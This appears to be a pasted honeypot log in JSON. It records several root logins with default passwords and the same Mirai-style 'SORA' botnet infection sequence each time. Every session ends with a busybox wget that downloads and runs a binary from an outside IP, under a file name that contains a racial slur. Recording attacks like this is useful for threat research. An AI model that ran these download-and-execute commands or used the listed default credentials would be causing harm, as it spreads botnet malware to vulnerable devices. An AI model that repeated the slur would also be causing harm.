- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.910Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.907Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.900Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.897Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.809Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.715Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:21:06.830Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "default",
- "username": "root"
- }
- ],
- "c6a1f7b085e2": [
- {
- "@timestamp": "2018-09-15T04:12:47.091Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:47.000Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.640Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.540Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.449Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.346Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.246Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.237Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.235Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.228Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.226Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.218Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.216Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.208Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.207Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.205Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.198Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.197Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.189Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.188Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.186Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.179Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.177Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.175Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.085Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.897Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:12:45.072Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "root",
- "username": "root"
- }
- ],
- "cfdeac26605e": [
- {
- "@timestamp": "2018-09-15T04:12:40.806Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.760Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.581Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.531Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.445Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.398Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.346Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.342Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.339Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.337Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.335Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.332Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.329Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.326Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.324Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.322Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.319Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.317Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.314Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.312Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.310Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.308Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.305Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.302Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.261Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.156Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:12:39.646Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "admin",
- "username": "root"
- }
- ],
- "e193b44265c4": [
- {
- "@timestamp": "2018-09-15T04:13:59.405Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:59.325Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:13:59.008Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.926Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.848Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.762Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.679Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.675Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.673Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.671Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.669Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.667Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.665Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.663Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.661Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.659Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.657Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.655Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.653Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.651Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.649Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.646Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.643Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.640Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.562Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:13:58.484Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:13:57.990Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "root",
- "username": "root"
- }
- ],
- "e72a54537f35": [
- {
- "@timestamp": "2018-09-15T04:15:34.664Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:15:34.573Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:15:34.208Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:15:34.108Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:15:34.004Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.829Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.725Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.722Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.715Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.713Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.706Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.704Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.696Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.694Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.693Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.686Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.684Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.683Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.675Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.674Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.667Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.666Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.658Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.655Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.648Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:15:32.853Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:15:31.998Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "t0talc0ntr0l4!",
- "username": "root"
- }
- ],
- "e986826fc214": [
- {
- "@timestamp": "2018-09-15T04:15:34.877Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:15:34.786Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:15:34.418Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:15:34.324Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:15:34.182Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:15:34.094Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.993Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.984Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.982Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.974Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.972Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.965Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.963Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.955Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.953Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.945Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.942Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.934Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.933Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.925Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.924Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.916Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.914Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.912Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.824Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:15:33.647Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:15:32.860Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "default",
- "username": "root"
- }
- ],
- "faec9c00af69": [
- {
- "@timestamp": "2018-09-15T04:13:35.489Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.354Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.834Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.699Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.571Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.435Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.303Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.294Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.286Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.285Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.277Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.275Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.267Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.265Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.257Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.256Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.254Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.246Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.243Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.236Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.234Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.227Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.225Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.223Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.101Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:13:33.974Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:13:32.470Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "default",
- "username": "root"
- }
- ]
- }
- }
Add Comment
Please, Sign In to add comment